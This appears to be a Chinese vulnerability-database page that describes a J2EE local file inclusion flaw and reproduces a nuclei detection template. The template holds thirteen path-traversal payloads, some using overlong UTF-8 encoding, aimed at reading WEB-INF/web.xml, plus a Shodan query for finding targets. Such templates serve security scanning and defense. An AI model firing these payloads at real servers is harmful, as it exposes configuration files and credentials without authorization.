Generic J2EE LFI Scan Panel - Detect

漏洞信息

漏洞名称: Generic J2EE LFI Scan Panel - Detect

漏洞类型: 文件读取

漏洞等级: 高危

漏洞描述: 该漏洞针对的是Generic J2EE Scan Panel,一个用于检测J2EE特定LFI(本地文件包含)漏洞的工具。J2EE(Java 2 Platform, Enterprise Edition)是一种广泛使用的企业级Java平台,用于构建和部署企业级应用。Generic J2EE Scan Panel通过检测J2EE应用中的LFI漏洞,尝试泄露web.xml文件,从而可能暴露敏感信息。

漏洞的技术根源在于J2EE应用对用户输入的不当处理,导致攻击者可以通过构造特定的路径遍历请求(如/../../../../WEB-INF/web.xml),访问或下载服务器上的敏感文件。这种漏洞通常由于缺乏严格的输入验证和路径规范化而引起。

该漏洞的高危性在于,成功利用可以导致敏感信息泄露,如配置文件、数据库凭证等,进而可能被用于进一步的攻击。攻击者无需认证即可利用此漏洞,且可以自动化执行,增加了被大规模利用的风险。因此,对于部署了J2EE应用的企业和组织来说,及时修补此类漏洞至关重要。

产品名称: Generic J2EE Scan Panel

搜索语法: http.title:”J2EE”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/b7c60754265d41e02af8d5ea7c8a40acba9a6233/http%2Fvulnerabilities%2Fgeneric%2Fgeneric-j2ee-lfi.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

id: generic-j2ee-lfi

info:
  name: Generic J2EE LFI Scan Panel - Detect
  author: davidfegyver
  severity: high
  description: Generic J2EE Scan panel was detected. Looks for J2EE specific LFI vulnerabilities; tries to leak the web.xml file.
  reference:
    - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LFIModule.java
    - https://gist.github.com/harisec/519dc6b45c6b594908c37d9ac19edbc3
  metadata:
    verified: true
    max-request: 13
    shodan-query: http.title:"J2EE"
  tags: lfi,generic,j2ee

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - "/../../../../WEB-INF/web.xml"
        - "/../../../WEB-INF/web.xml"
        - "/../../WEB-INF/web.xml"
        - "/%c0%ae/%c0%ae/WEB-INF/web.xml"
        - "/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
        - "/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
        - "/../../../WEB-INF/web.xml;x="
        - "/../../WEB-INF/web.xml;x="
        - "/../WEB-INF/web.xml;x="
        - "/WEB-INF/web.xml"
        - "/.//WEB-INF/web.xml"
        - "/../WEB-INF/web.xml"
        - "/%c0%ae/WEB-INF/web.xml"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<servlet-name>"
          - "</web-app>"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402202ff993cd6cf0a21281344ebd95cff196730e8edd0ff78525ab913eb1562efd0602202496f4afd4cdb3727cd4577ef41191cb7bfc1dfbe50946f02cf9c7d97bfb4133:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #文件读取
Generic J2EE LFI Scan Panel - Detect
http://example.com/2025/07/21/github_3508744682/
作者
lianccc
发布于
2025年7月21日
许可协议